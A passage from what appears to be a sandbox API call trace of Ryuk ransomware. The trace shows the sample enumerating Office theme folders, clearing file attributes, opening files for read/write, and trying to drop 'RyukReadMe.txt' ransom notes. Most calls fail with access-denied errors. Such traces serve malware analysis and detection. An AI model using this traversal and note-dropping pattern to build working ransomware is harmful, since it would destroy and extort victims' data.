Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.213] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.213] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.213] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.213] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.213] SetLastError (dwErrCode=0x0) [0133.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.213] GetLastError () returned 0x5 [0133.213] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.213] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.213] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.213] SetLastError (dwErrCode=0x0) [0133.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.214] GetLastError () returned 0x5 [0133.214] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.214] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.214] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.214] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.214] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.214] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.215] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.215] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.215] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.215] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.215] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM", dwFileAttributes=0x80) returned 0 [0133.216] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.216] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.216] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.216] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.216] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF", dwFileAttributes=0x80) returned 0 [0133.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.217] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.217] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.217] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.217] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.217] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.217] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.217] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.218] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.218] SetLastError (dwErrCode=0x0) [0133.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.218] GetLastError () returned 0x5 [0133.218] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.218] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.218] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.218] SetLastError (dwErrCode=0x0) [0133.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.218] GetLastError () returned 0x5 [0133.218] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.218] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.218] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.218] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.218] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.219] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.219] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.219] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.219] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM", dwFileAttributes=0x80) returned 0 [0133.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.220] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.220] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.220] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.220] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF", dwFileAttributes=0x80) returned 0 [0133.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.221] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.221] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.221] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.222] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.222] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.222] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.222] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.222] SetLastError (dwErrCode=0x0) [0133.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.222] GetLastError () returned 0x5 [0133.222] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.222] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.222] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.222] SetLastError (dwErrCode=0x0) [0133.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.222] GetLastError () returned 0x5 [0133.222] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.222] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.222] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.223] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.223] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.223] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.224] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.224] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.224] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.224] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM", dwFileAttributes=0x80) returned 0 [0133.224] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.225] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.225] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.225] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF", dwFileAttributes=0x80) returned 0 [0133.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.225] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.225] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.225] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.226] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.226] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.226] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.226] SetLastError (dwErrCode=0x0) [0133.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.226] GetLastError () returned 0x5 [0133.226] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.226] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.226] SetLastError (dwErrCode=0x0) [0133.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.226] GetLastError () returned 0x5 [0133.226] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.227] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.227] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.227] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.227] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.227] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.227] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.227] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM", dwFileAttributes=0x80) returned 0 [0133.227] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.228] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.228] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.228] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.228] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF", dwFileAttributes=0x80) returned 0 [0133.228] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.228] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.228] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.228] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.228] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.229] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.229] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.229] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.229] SetLastError (dwErrCode=0x0) [0133.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.229] GetLastError () returned 0x5 [0133.229] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.229] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.229] SetLastError (dwErrCode=0x0) [0133.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.229] GetLastError () returned 0x5 [0133.229] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.229] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.230] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.230] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.230] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.230] 